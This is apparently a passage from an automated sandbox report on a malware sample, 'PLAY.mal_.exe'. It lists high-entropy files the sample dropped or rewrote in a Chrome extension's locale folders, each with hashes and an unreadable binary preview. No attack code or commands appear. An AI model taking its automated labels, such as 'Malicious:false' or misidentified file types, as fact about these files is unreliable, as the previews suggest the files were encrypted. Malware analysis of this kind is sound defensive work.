.G..|.3.9P.PL.f3..Q.#..i.A...V.O.....j..yA@.........h.1.a"....:.@......(.pyJfl.kx...M.wKx7:"WV.....$f.+.^U...f..H.x:51.....:.w...J8 .F"j.....y.Gp.y...3..GQ...a,l...T..U.|.!.I>..........................

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\my\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4904
        Entropy (8bit):7.962490349076083
        Encrypted:false
        SSDEEP:
        MD5:659D3FD8E060A0D3BBAB5768A49EFAC9
        SHA1:033FD7BCC86A5A080C64F8EBA6CA332E26B6C3DD
        SHA-256:7DE705C75EB2E8EA2E3BBC2CEE3016D0ECBE098EDB70AFA97A2C138AEE65B143
        SHA-512:7FED9DD5742FA2E9611B25E030641ABA03FA1C460E4B4E125FA88521D57E94851910BBA8E8E6E59317D47AB54625D287E12A1F11F88FB8A69C2722710E59D7E8
        Malicious:false
        Preview:+..u.....@X.I......:`.=.).-D". f..N.z.r.5[.(.Fv...e.<us.X....J......=.4.H.O^M....>&V(F.?3D.$.z.l...6....P?z..g...........3X...h.K.....O.+$..U..K.....\..K{..jt.._9.......{....?...F.F.l.>.]Hg?. ....D..7..;.=.p.<.1..H.....E3t@Y877...Tw(7f....].4K.....c8.^..#.@'.._.A%.D...(|[.......*..o.DVY.\"b].@.Q..:.!..)....j....5*...P..C..q..+.~.j..1.J._......d.].I|OS........|.}....V...........N)5.w.Or._.3w..y..3G..t1.g..9..O.zi...$........".-u.7...Q...p.N..Giv.y...yO....|..M...#...<?....<....N[.r#T.m..>..]tV.X.\..M.....F.!je...Ab...(.o.RkuX.NF:z.! N.1..X-.B....@JG^..c 1E.f@....CM.0b..G....t...;..j.p.ob.|.....y...x5n..-.....B......Er1..*.<?.T....z.^.1..U)0F.k./.q.NoQ>\d..KS...._|..V.Mj.....'P/K\.Il....a..s...&._.M.}.$.Y.......G.L.......:...p.8...0.=....S..~."o...Z4..8Bcy.<g....?.n..fn.3..y/N.SU....*$.'..V8.h....X..].@I..N|.wmM9..@.O2...X>=...].D....(E9.s...ZL.53%.K.."......k......a..,..z..P3R...%..#.`y...=.U2..0......|.7,:A..$.0X.X&..!3../.\.7s.'/

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ne\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4296
        Entropy (8bit):7.956304202032105
        Encrypted:false
        SSDEEP:
        MD5:DB2F60350FE49CB1AB94623641156353
        SHA1:72EFD7A0D3921D9E88E5203A3AD80D6DDF70C714
        SHA-256:0689CDCA5CD823485A4FB4200F1DD40145ACD7069C134A3E43A51DE934FDACCA
        SHA-512:258393959B9DE2623C6F18C2B1BD1DFE73D70609C68567AA68A28959F69046902824332A7717A69976F46C09EF3F90E1CA67F6D99069C95B3A2352C090805928
        Malicious:false
        Preview:..<.......+....`Axb.D.....N.9...@.....":t...N....iss....D3.SG..C..D1}...L'F..c..z..]...F.....]...K.!em...@1.6..i...4..C6A.^.%..f..r.V.~z .q...0..].{.......`<E.:o<;R...N.!-..?..P..R.m)*l.;. ..'....'H..^.|..r.....}....>.S......H.....&.{...q.:5*i.%*h.;.+...F.@.T.>.d8.[...9.#=.,.I......g/......"....}4.s...,..:...G..JK$Y(.q..@.\?!N...F....Rdo.Mo.&w../P^.y..Xf9..V.."}\.I.+..B...8.^.w.K..|.m...q..../MD.w....9Y....@.t.....^bw.S..4.e.Z>j...........D.Nll.E;a.2..M...G..IC.u. .....g./.YU.G..Ta.....J....y2tnx.....$~1B.......(@~...G...hd..mA.2..%n..O.1.p....T..k......Z#..:...}...3.W]....Wv....4*A.R. huMV.C...M.[...#.5....c....|..e.Q:...l..3..m.J.=..^wF.`.....aM.........n..t.#....|.AZ....T....2...E#W%.......l....]'.pa.....c.1<p..=._...p}.ql........:......N.N..~..(DR./.+.....@...*..\X..u...xrr....M#.'j..S..s.c..,....Z.. K.M:z......M...!j..._.<..........4.LF._...|......M.G...>....U........e@i+..L......C.|.$6u>u.*p..M.8........D.M...nG.j.o..B....$.....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\nl\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.896584550606547
        Encrypted:false
        SSDEEP:
        MD5:F9F41B1174FF37BC29DAF44CF4F2868F
        SHA1:D6EE77F79B9B4BF11D7AF8D6B66DFDE1298525EF
        SHA-256:9CE75D5EECD633039B6C2CCA2FADB86CE0C3EE9CA0558578676E43A75BB9577B
        SHA-512:C9AA717470ACB2217B2E3C16A3C6A13FC359A57CE599D3344A1F163EB877E5AD8C52B81298433197ACF02DDEC02D5A67316D8168312EAA73AEBC727907435FBC
        Malicious:false
        Preview:..p6^Uv.V.S5(.(e.z....;.hq..l......{..J..p...A..I.?.....-./.Sl.;.M..U.b.~.YN...4.>.*..s}...#.*...Nn.L.f..owF+18...[w.."T....>..h.......q..*vA.R....c(T)E....Z....{B>/[a.q.hN..3"..M(......c.}..0.>w.3....L..'3NA..KhKdB....z[....1y.f}...S}.N...7...jL.B@..O...... .'E...P0#U.y4.."]5..kM0R.X:H....k.:I\W...%P>.k$2...9.E.V..fr;.F.#4.....U....)j..5.6......HQ..&.).4..'..nA.6)1...l.mW...m`[r....).......6.s....EW..l=...~..[.+'..0....c......O..!x...O.G .!J....~...|(...U......w........BN.|...3....=.r.I.......w.....g_..d.6.&l.l.B.M.pM...6m..c.S...ZC..F......t{B.J......Y..N.T.ErJ6.w.....$a....... .B.M.......)..r......bz...Z....,..:>.lg."X.0....-.h.B#.....Eu..$S...n. ....@...`.+.hU..2..fo..i>.r..|GxO.n........n".3N..c....X.........b..^.....;.p..-...P."...~.e.."._......=1.*.<..-....D..y.(_Z@.[.........[...".]....p.....S....i..$r..2TZ)G.|./Q.32.....g..Vt4.~.._+..p%.+...t...]K,.T....4./.......m.).b#..T..U.|.!.I>..........................g... w..#.x........1.o../...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\no\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1832
        Entropy (8bit):7.862844008052338
        Encrypted:false
        SSDEEP:
        MD5:F762EFFD9BE974ECE4FC4A6C3A752F0F
        SHA1:696A60E36EAE7C6B9FB727E522F4F9B1C85DAD16
        SHA-256:13163DBE6FD425564926525403B34D89A4ABD5C6B72C876DFAA7970441584920
        SHA-512:328103EC1A833B0F5D9775A931320657B55092A46E9D7EA4B8DF68CCD2FCE7664A68ED73A5ED78864507109098BD25FA12CD00903406D4D716F3116A6AD21724
        Malicious:false
        Preview:c .W...z.Z..3(x:.=?s..>.......$.....&.To.d_~m[{V..@|(.s...|......d.,$61J|..>f.:...Y.....P.|..t.[....Fm.E..g~..X.-.....J='..R.....X.y^zm......% 7..Hq.I.b....A0_.,j.v}8...H%.....DF.h.P.a.f.t..\S...|...h....D(:[..P...Ia)..y...O.....0....x?,...+. .M.w\Hc...8.....c..W.."q......l<M..K..N3.F.<"...p.......~o.3.../.L#.XpSn..........N@HR....+..."....uy.:y......b....S..]d.R.>......s...9[.N.....!..`.T(.6......r.F....n...UcO..z(...........w.D...7.....-v.6maM...K^.6.....6.A=j/-.......3..m.E-O.....[....G........BQ.9.i.t..E.O...+O...#...M..&..gy%.t.{4.q.Lb....CTM..i.../+...xC.%z.G........B......-QU..Edc...0.7..N.....J.EZ.z.......:!zi....0./...db>X..R4..RO..DE....9"....}Q...T..,...(...~f.......g5R..b..%.XV.4Itz...#....|....HB..W.U......T..U.|.!.I>..........................0n...k.c.aJ...N(.F...$.[.......<R5.........y.....{..S..... 4.A(.&...`...^i........o`.q....=.c....L|/.Aev^...f......?.."...i.4.P#......E.KU.d.y.*......eQ\d.2J.:.R.y.I@.8..[.....|.o.....4.R

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pa\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3864
        Entropy (8bit):7.952800033298573
        Encrypted:false
        SSDEEP:
        MD5:AD94B1BEE18A6E011299624825B53766
        SHA1:3CCF777BC1D4ADEB6921A3763C9D0B80A06409AD
        SHA-256:8F58697288BC90831AA1FD632F5CDA1D57A261EDD6BB1D7D814E8789E45821BA
        SHA-512:F150B763880550E8C5E25D5367848649DD2393B2596EF6D7610C7397FDC14BB706D02A68B81AB25B3FC5E8DBABFAB7C393F2FB1CA6D0AE7E3457DBFBEBEB339A
        Malicious:false
        Preview:..(n..cR.sC...A`uO..ag.S..K..j...d..c..!...j.g?_R....b^.........T... ........fUo.|G.DHB-H...fW.".N..As.X.%.?.:-X.$.z.lQ.....u..>Gm&s.k...\.s..9r.yL6.0..A..F.;...E..}y.=m..`p5....6h:_....:.9>..S\h.)(:....7.9..'....;w7...IG..N?..7/..]....3..+......K.l.j..l......4....M.h.K..#...H..A.V.....4^x./.v#....FV....l.U:...=g....}N...<.rW.g.R.rV.iXC.[...w.0....LG..q/F?r....j..]K.7...xhg.n.2.;I..T$?..:.]....J..f.u.3z...n.s.d....*.(...v..wJ{..m.#....3=.t...j4{.b.QuR[[..pMe.F...T..1Ma(Z..kD.b~.0_...Q.....J...s.........."T...._{.>.}...WY.........D...RI...Z.9=.c..........A=...d._.?u...Pb.k.T.K}YjL.B.m.T...9\...:.p&J..F......8.p.r...e.+.........[E.C...5..H....R./.l.M ....kU1.....;@g. )....I..s-.)....-`.9...zJ.u...1..:+....n....1.Y..dsIB.CKJ.W.......`.....x...qPLc..:aB.<.$..%Ym.oU#o.}.r..S...=.V:.V;.YX...7....B>..=...:.}...%.V.L.............C0......?x../...J...)....Dg...`g.....Q..@...i...e.....HOmZV[. ....bP......i&r.....;'5.d.......4.M^....U

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pl\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2056
        Entropy (8bit):7.898237034948778
        Encrypted:false
        SSDEEP:
        MD5:007BE72560E3715A894F719E690ACF79
        SHA1:419CF57E656F68B0BB8D77AA079E556D15D4480F
        SHA-256:DAFC2F442D00305FDFD4608E79EC5E1FEBA005BE713223A44DA3709AAE893E68
        SHA-512:1512AAF45AB90C1397C4436A58DDD566C9180CADC1F074D0911CAAA3CBE0978E7B261DBF5B3C1048DC3D08B010E003FD14E0349B68553AEF26A87EC6B01F5DF9
        Malicious:false
        Preview:Q^.....`.........-......Z.0......!t.`...Z............`Y..O...\k.)...&.2.0;ac5/.A..!..\.....?...y.A.8W..._...k....................Z..+.S.g.~......)M......>\._};....C.7.U/.S...^..m.......*(.F.e.._......j>U...I....r%..Xd.A..R...!0.V........Q.bz._M/....U..Z7.../.S....9..j$... .4].....G}..>..'[)..S..Z..5...(....z..:..-...<. .q..N.f...v.B..\..=....g*T...a...=f.AR?.Er&i...U.....x) ..q...}..+Z'7KS8fvr.....@.R..>..L...1..Q.|.f..8...K.z.F>.f...........}..o...p....;....`.}...m.Q...W ........eHcl......5..$e...B..gfe.b.x.T"i"...*+=i~.NuPx.l.ny....,=5/....m.....1d.a9ru..<YN)...Uj.>.c....J@[..w'......YM.y.....{...MZK%x..4.....a.T.+...e....E....R..m.../|.$........k.r........Q.$..o...n.L-e..;.oP..ZA.....4.*..0R.........e..x...I....H}.......s..?.6...=..d.....;.....PO:.}..<.]..l............^...I...).\}N..V?..c.......V]D...H!.......$......<..g..y=..M.!7X!..).Q>j|S)..u....Q..-xq....&4...[..z..@.@..h.bYheKlB.!.VWU7........W1.......-....uW5..SCH..#.G..k.r..Q..x....T..U.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pt_BR\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Sub-key -
        Category:dropped
        Size (bytes):1976
        Entropy (8bit):7.8894245911517435
        Encrypted:false
        SSDEEP:
        MD5:CE2769025F107FBFA33478E21B4A84FD
        SHA1:C0F705D50C5DF4054CD933F3889ECFC48AA7BEF5
        SHA-256:FABD57222B0E8937EA18BDB12D10CFD541C600FF2D63C432A6C7E54A900E5A00
        SHA-512:BA1CEA7C6B44D720D0FD0DC666B72191B2DE6AD2EF3A9A7A0B4C61257CD17848088A99B4AE24CA3C48439D3926845BF6F458A0FA42825A02EF25AB84CF8CACAE
        Malicious:false
        Preview:..}9..`w.X.t[..mU..7....Q...!...#..p?....&...<...._..| .".k.r...]....n..O\~_..3G....24.c.k.F........N~d.!...^..;..Pg..m.)....>.>.72.CMD....N...5N=..Y....+`}.&....w..6K..$......@.TH@(.....y....A..6.fA.;....6.A......b%.....cx:...M}.|.b.b}0.].........f;.;.Vt.B..S...Z.SA...{/.K.\. ...Y..m./.........d.-|...O.r);.c.....:.......u.P...{.7..1:........... :*:.p3.../k.[....w.......@~.[Y...B .....rHs......pmT...*.]...GvW......#...@.s..g.....o15..B`.......xN..'.Ny.....h.!......U..P.T.....Z...e.. ro!.P.,e..Q.K.9..4.;~\.a....'A.Ji...)..x.$..]..j.g=..` ....W.G...H.... .=`.+....u.H.Z...9)....k..@P2...UW..??@i.P..E....Vli`..$.....<.a.Q..[d...r$K..C]...F.;....;.B..>......h9.....1..;j.y..C;...D*..a..(u.R[wD,..|....Ue.q.a..).C.E.......An8..#..$..9..Y.8.s. ...w...{....6.T.e....v..X_p.6ihIFY...P.^.P..&..e._....z.>.o.....S.{.#~G.*2t...6...~.....K..Fm..UY.U0..d.h....U...wB...T..U.|.!.I>..........................nv.`._....N.*..6.1..;Q...MV..E_|..R.X... F....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\pt_PT\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1992
        Entropy (8bit):7.894039299051002
        Encrypted:false
        SSDEEP:
        MD5:E56D495F1FF16AAA74147770205E9A02
        SHA1:6555111FDA0C154F77ADF81611D2848492E98341
        SHA-256:2FC8AFC0FA92C552A0CBCD1FF02B9970F6520E1F7330FBA072CD3963DEEC5D6A
        SHA-512:3D1A154864B716C6912A64A1F7F0704E0899AF33CAB2B5EFD2EACFC03C788453C2FAB438DCC45BC884ABF90B3CF115A3901655FED855193F2A14D1F105F891BD
        Malicious:false
        Preview:`y.]r....32.d.2lk.Y.......Gg`...}.,>%&..%..S<"4......<;.t.5....n..5fE..j^..G.J.:.....(XD...Q.)..4.q.C^..8...."M..[.M....m......P.:.8...mb....;.P^T.\23.M.T.+..e.....5]f.w.i.r."".`U@$^..E...U_...B..i{...i.'U.(W9^........i.Q........x<.5........%...<.h4R.....l....`8..z.....G...Zhz.+.k e.ch..^.U..V.S*].U]B..7;..l.....a"...U...l.f.4w..R.>..Y..."..n....1.......3j.Ea.z..a....r....hx.Y.....&..a0>..H..!......!a.r...2PspsY.G.3....oV.'.i..]]O-`&.+Aw...#.Z.@....0)l.....P..?o;..A.0....;...6.B....3.R.&...6U.F!r...=.2P.r.^.x..8..!.O.y....G.g....j.R...Q...%..7W.-...3@,...P...)./.E...Mi3.z!<..t.7%w..a.X.....mR.h#$..E..O.Q5..;c=.9.Ur.."G..1v....4Y$(d........k......9...%e_..7l.b3.N..#O..S....z.9f.s.l.7* .04.E8A......a..).<......_(q9P...$]..}....DW....*.yoY..7.$a..F...X.iI...#...[Q.o..8.....M....|.Ut:w...#S.}_.....D..4........... ...w..".0\.igp...w.0.....h.._..j.5}..Z|..G.....o.)..`.QS=.?(k4.(m5.^...T..U.|.!.I>..........................$MZ.$.7...jn......aa..9.f-z<...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ro\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2024
        Entropy (8bit):7.892144967509385
        Encrypted:false
        SSDEEP:
        MD5:52A43048A4EFD22DC0A98B91878B29CE
        SHA1:7E499A2B918ED3B6E4C968FBAE369A3E07052A94
        SHA-256:D6DC3B6ECE38630A1365E53F72E8070C564B8A583B892A765E4EB0DA079FFBC8
        SHA-512:9A8E0C5A1EB6857845E1C2B7454F07E7A788B5AAA01516B48DCE36E2F64FC60679AF2C9DBB0FBF6C7B97B35E560ECCAA0A94F46A7FF5EEBBF3A13B0A8C8B7FE5
        Malicious:false
        Preview:.lp.@....-l......=...C.,.,...s....q. ....Z...........S..c.3..t..o..OZ../hI......7....b.bv..>...[..._u..~.pD.h.Eg...k$..h.J.URj...M<....^.Rtz...SC..0<.;..Z.d.....m...4...X\.>........dR.P.y...m.....z.......1(......K.P>f.).3.tp..I.LG...;).m+...bC.........=B.1,E.-..d}.c!....Nx.F..p..B..)...[*\.[....Gl.M.a...H}...p..e*8."4.... .ce..~.C..t....xP.17el..L].>N..l.gL.i....~..sq..4a7p..Ix?.......0..kM/.4..W.b6....7....-g.U.b..d.~.5P.\$.0......).k1....A.3..!...^v@J......)e@............-.m..Fc\..fl.r>.z.........\...,.XZ..O.Y.3.......C..V.Ae.....}Ay...To....h&..r.......U...?...#...Q.Y\.;.a..";.S...Kb7`.9M.rn}q.'.A....A.4...aN}....R.2.&..F..+E....!.,{.E..c.V.nQ....:UP.......l.D...M...<.P.\..0..=>.{..j.yW..k?......i.@.#MM._...}5....P.j...b.....j.....V.c@r=[j.>.Rv..H.3..:]+...K..S.7?....{.m..."..#.....b........{..9(<..M..3......L\.Ca.tUy.Q.>....4.X'.:...5p...x..T`$.g..&DG......-$.R.l....I..M..4k....Zf.hiX...O.v?4..}...T..U.|.!.I>..........................

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\ru\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2408
        Entropy (8bit):7.907898480350156
        Encrypted:false
        SSDEEP:
        MD5:838CC1E520D6663FA8D9711C114DD0FA
        SHA1:5B27BA8446AA7594212611E0A1AAD96AE13FA54D
        SHA-256:6FF460B86BC36F9C38BC19DB954B7A78965F951A024D4223C15F699A87D4934E
        SHA-512:AE466325A971180818958BAE46F217305E89B94CEA5D016C9D8B25FFAB9E51A57265338728889B72AFE2EA5E0409E2E1FA36F9EF4EF9607D79850C3ED5F39325
        Malicious:false
        Preview:3..u...a..o.......J....a.....)'....*y.H.`....w.)$..7.Y.BDCY0.h.|cp@YRNH...kc<]J.K...:.........9.;...M.Nx.H{.J6..wS....,....?^H}..sV.I(..jvT/....(.<...{...w.,OuU:I....@.B..[..J..-8.vv.4......(....B...l..}B.vN..!'.jj^2..J..b...W...{.*.\j+.O..v..]..j..N..o'......W.Y...729...Lt%NQ|..'.b.E).'....>..ul....3.9...Cj..ev..Z.H..{..}+.[....lc.'3dM8..uIz.:..w..,..NjI.#...1.;y.).xZ..b...D...Y..N..2..b....ZYXdS.!...J.p..C.....=.Xj{3dc-.f.47..~@.%8..&7..B..=...(..>[;..1g..q?m%....h..$.........-$......v.$...b.....b'..2.EP.R.C..L.28:..l...\..... M....4./!.....?.S..h.....1..A.,7.%.-..j+U#F...WtQ:y.E..e\..U.....g.v......{.x.!.s?]e7.B.v...i.a...||.._.?]."U#.........{({...T.........~Lt.....dka.....~F..i..S%.}.I:..7.B.S...3;.....E0Fe'..p.....-...>.q.x-...V..\..K.\p.q~.A....d|}]...l...}..Ur...7....O...-...O.^....3....H..g=6....i..si..m.[. M....P.U.q%..|..p....{..].h.........Y.S+..3X.>|.....r..w3..6w.~..UqKA.U...]....E~.C..k.....r..KL[.&"..9\E.....g.H.V(R..B.:....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\si\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Sub-key -
        Category:dropped
        Size (bytes):3912
        Entropy (8bit):7.9623442120626295
        Encrypted:false
        SSDEEP:
        MD5:CC85E4C93B96DB7B1FB1277D9FC7F27A
        SHA1:7A178FBF94F42A4BECA33AA98AD7BDF28979EAFF
        SHA-256:30D5D36AB027017A47AADCC314527541174E44D33B514E5FA200E32959F039F4
        SHA-512:860293038E761962A1E7FFF02AF68886A4BBFF2A720EA3B9E1B25BA74D4029DE98DB93A904A31A6CB2577EE5722BC777178A0B5D35CD20157265DAB147DCF744
        Malicious:false
        Preview:.+..6..jj...y...%E.C.{....A...:./...X..F.TN.w.P...`..G:....{c..W.F)..Yr.~8..7.V.Q..l.$.3........8.../)3B...j....*.....A..d4H.E..W_.-..i..jJ.F.!a~\..zgu............5..V..\g..3OW.Jr..il.MpB..%.....v....*J..B.....*...)..2....1.l..(..39C...#m...z\.8.....r.}.2\Ry.L..+=?.z.W....1..'rL...J../`..e...e.37.D".Z..VK....4..0. e..X...?.b......p^..h... .}."........Kl.o..U.n..a.h2.>..TD.W.{5NT. eT7..X......N....7.........- ....?....F...9.`B..e..^.B.....!....9.. ....fo.{...k@t.h.S5+.w....6.>c.l.~....2.'..HI'..+Ci".;....S.,........b]..<...m.Z......}.W..1.^.l#S....+.?2C........8Xs..D....`.M`.n..<.... .Q4....|U.........98.3...&c9.o..Xk....C...[<>nz..A.M..H3.qc....XM.y......\{..`...h..a.a.N....ar..q.....D._...x.L[FwO..5)..:.u...G..J.GQ.......YP..._.0....4.....h..VS...s..E....g..v..i,/.....g....{c..q..b..d.7...\..trOm".v../8.h.7.."v.v.Q..p-.3...K`m.Ry|.k.t@..........v....6t.[..k....I.y.d...>.gZ.....2.....n9.G..U3...._...5I.%...!WU..5_....V.}f%.g..>7...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sk\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2008
        Entropy (8bit):7.892498473350344
        Encrypted:false
        SSDEEP:
        MD5:977213D9940F2B1969E0E031A33B7D07
        SHA1:43E4E2F68C31954F63C6A83826963EA7AA2A9AE2
        SHA-256:4BF53BDDEC4FDB5E1F4925307A355EA7D305F6D9D5C2321759B5736A09B134CA
        SHA-512:37202E52B58901C9B4510532A7F23261A15C7BCDDD3AADD6BD2A4912E1E6FC156BF869599E0EA463B45CC20D698CA6F551D2E3F4F0151F1E8AC51B94DAD614EC
        Malicious:false
        Preview:.b.5.....K.@.FC..LY....N...)C....A*...."...Z.&...L..b...`j.n.T..5..n.lA..)d.....0.&"...+ .+...<.E.o...G)~.UD..A...*.l..xe.;~So9..:.;H.c......i........w.....~.../ .$.i..u\..T.0.cJ.E..E|J.......p[.......?.C........V.UP.>..T.2...~..&....7.......|..?.N.....e..+.Hd.\.T.......wT...%.y).UqH+.6.......n...W3..[,E..0..z.....(q.4..h....c.6.U.'Z^.h26...a..>...,......1..tN.$^...N.....N..` f..AZ....]]...Mu.tT9C...Q..(...Z.[.1....C.?p(....g...E.>...`t.Y.5...E?...Y.].....'.Uj...|....h;.g...............'..+.@....{.~`!.}........W0._,:..a<...K..8../."@|.-w........#.!'....?.`..FI.\..C4....%....!A*..C.........+.m..u..Y.`L)..'...[.]...{..P...[...w..a2.p.. ..:Uo.+.-...:............F..Nz.R..Y._X..Gg9....F.c.......]i..'.....c!G.I@R...|..s'..Q.3=..9.Snn...H..!..B...H..C.q.hD`..}l....*.b...:../.....o...w...cu..p.[."{.[Z..F`...r.4...&5[..!..y....c,..._..~..1.,dN...DkN&Q...q..:^S.......)..'.......k.......T..U.|.!.I>............................v..\..U.h.6...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sl\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2040
        Entropy (8bit):7.905593728361142
        Encrypted:false
        SSDEEP:
        MD5:AD30A384BAC9C2E2F50DE16328EC4E0A
        SHA1:94FAF9F4A411F3281346E0F8B7CB13AA52FCBF94
        SHA-256:64910F9FE10835BC1F2AF640CC77987A5E9AED8C35D7BDD309E9C20D6722ED19
        SHA-512:2D3E07F36CD4010056D3E213E035F476CBE9568F531FDA26F901413E3E0CB6D7AA10494E08BA326F6AFFB435AB7E0A1BC9CAABB163117790D93E7A923234BEF9
        Malicious:false
        Preview:6.z@#.N.......[.C/......f../...+..A8...x+0a^......6.z....$?..(.....O.4.q..Xd..._f.;..!rf$.."...E$..>...j..ToR.Z^.:}..),..m.\0..J.$@......"2j.-...'|.1.>.31...5...O.s.".[.G.u....0.........o1.5&.M.H.U3.]..r.Ql.g..../......x..1.ex.^.#...o....f. ...g..&X.x...`."|..z.....G.PzE..........nD._..A..WQ`)<JT...c..^.p.KhdF.*...E.'......a..SF....g...G.t......U.n......$.d...I........-.D".\<...........m....`."....cKl...q=...V...5..Jm..z..P.......\f.....pj.CC..T.....4~Sqp..d^Pb..{...r...29.h.^....6..8.i{....j...........-3..s.H.W.T.Hz.^..........<.....C..f0..t(...k....2Te.../..:...\>.......Kr3p...lT..|.sy./....$.%}.Vi$.6..i3...%..;.o.Q)..dIi0.....b....6..x...q.?.....H.F..$\KR=.BX.V....t.k..............I.C..X...z...k......-.a..zq...S.(qd.... ..'^..'vd.>'..7.C..~g..S......P*zgd..D..o1.(....u1.....l..[d.[..K..#.w#zc..F.......x..Z.(..U'.Y..|.....h.>.*I..j.";)5i...T.J5bA.LE.l........f.*......-Tm.....m...o0..o..9.v;f..K.`...\....v_....T..U.|.!.I>..........

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sr\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2392
        Entropy (8bit):7.916079789167883
        Encrypted:false
        SSDEEP:
        MD5:5ED39A8F554BB0AEB9D9A447AE41E5B3
        SHA1:12ED540E1234BD7E2BFE6E409DA8298A548DF504
        SHA-256:C75AED28335AD2670122F7DE33F6EC2D198BFF83075FEFF599D897656241C886
        SHA-512:700F6C2D6CC4FABCB432CD33A09711A8F184E24E1676B4374D4591727DD525278EF1FB32F3FD8815BDAFC131A59FD6D057802F4D9E7CFA1866726F9DFD6543EE
        Malicious:false
        Preview:.O..M..Q.Z..U..pbk..'..........6F.G............?..m.....a@.f..~.W.r"G.2(.@\..%.....6.(...-.'.Of#....i..G+......5O...*:.....pK.O.._......JI...l..qe...*......j.e...J...O...."\....B.."....GV.M.q)4u......./`O.v..g.=...!.1..Q=+..r..U.c...S".s.Gp@..:..JX..............&.1O..._d..n.#.X$f.........Kq.N(..I.4GG.%.U.(..+.....Dlx.K P.......\-m.C....>.....d..'...(B_.s...d..9...og.Sa.,.N....IG...E...?.....m#.B&...Dd...q...*.u..3T...GbH........2......21=..L.jf..b.|..2.....@d.....~..6.?.2.< !L8........UK........(.i&.=..u...P.GuJ....W...Y.."..[Q.%..Z.D0.r59J.&XI......[.v...*..I.B...6.....5..(...\.b.H...........(..4...e.HtU!..(l..........'"m..w:...O.=..?Ng.16.e^HM....0L.....wP.d..Mj...4<t..y.3.....,.J%A...G.Y_m..SW.%...Wj.6..0.....A._`s.S(4..l.......>.....dr..........Q&]p....0.B?../.a.sD....'.Q<..$.@.s.>..&.t......%.;1..=\.L;..H.Z......p.gu..|r$.....W..a..i..n.R.....!.c.;%.X...DEc.l..e. r.I...K.)..")<..r.&^8(w.9..;M.....c....1...m..U[.*.R..?.z.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.14.0_0\_locales\sv\messages.json

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1960
        Entropy (8bit):7.9026801784339
        Encrypted:false
        SSDEEP:
        MD5:BCCD4EBCBC20C98CE604C24A65FD6E1D
        SHA1:0C8DAF21C7C255D2F956C30165DA6337EA36D3DB
        SHA-256:DC2EB83D8E324D9DAB4E637F92CA72C4C9A307BB15D8DDABD28ED7D57B210600
        SHA-512:AC53571554C3C338D28D023A4F58D00AC507F00256EF6B5E9534D3E37301AA6E67AEBDFBB72A7E127451D22BCDED9012CEE1EE3BB113DC4DD754870175423888
        Malicious:false
